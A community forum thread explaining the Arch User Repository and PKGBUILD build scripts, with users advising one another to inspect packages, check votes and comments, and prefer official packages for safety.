The Arch User Repository (AUR) is a collection of user-submitted package description files ( PKGBUILD files). These description files can be used to create package archive files ( .pkg.tar.zst files).
These PKGBUILD files can be used by an AUR helper (e.g. yay , aurman , Pamac) or manually built using makepkg. The resulting package archive file can then be installed in the normal way.
All content on the AUR is uploaded by ordinary users and very little checking of their content is done - it is up to you to verify the content is safe to use.
A small addition: AUR has “votes” and “popularity”. These can help judge whether a package is 1) properly maintained and 2) trustworthy within the limits of the AUR system.
In addition to this excellent post, I would like to submit my advice for inspecting the PKGBUILD files:
as well as this simple little script that just opens the web browser to the package page on aur.archlinux.org, so you can view the comments before installing:
Save it to somewhere in the $PATH, name it, for example, aur and chmod u+x aur. When want to look at the aur webpage, just use aur package-name, for example:
Also, I’d recommend anyone thinking of interacting with the AUR to try installing a couple packages manually first before moving onto a helper like yay or what have you. Not as daunting as it first seems and it’ll give you an appreciation of what’s happening in the background. Plus, as someone who has created packages before the PKGBUILD system is far easier to get around than say creating a .deb file so if you’re thinking of creating your own, you’ll realize it’s not that hard to get up and running.
Arch wiki has detailed instructions on how to build packages manually from the AUR (i.e. not using an AUR helper like yay). See the link posted by the OP.
why did you said "description files (PKGBUILD files) ? isn’t those files in AUR are packages ? or raw code ? description files as you have said, is actually an instruction list on how to go about installing the raw codes right ? so that it is build into a program to be installed ? i am sweating here… confused.
A PKGBUILD is a shell script containing the build information required by Arch Linux packages.
Packages in Arch Linux are built using the makepkg utility. When makepkg is run, it searches for a PKGBUILD file in the current directory and follows the instructions therein to either compile or otherwise acquire the files to build a package archive ( pkgname.pkg.tar.xz ). The resulting package contains binary files and installation instructions, readily installable with pacman.
As @jonathon already mentioned, the best source of information is in the links he listed.
But to (try to) answer your question, it is up to you which one you decide to trust, or trust at all.
Remember that AUR software is provided by anyone who knows how to do that. There is no guarantee that a particular AUR software item is malware free. That applies to both binary and source offerings.
The user (that means: you) is responsible for checking the AUR item. Blame nobody other if things go south.
Because of that, a general recommendation is to always prefer official Arch packages over (similar) AUR packages.
Having said all that, I believe most popular AUR offerings are quite safe to use. But again, better check for yourself.
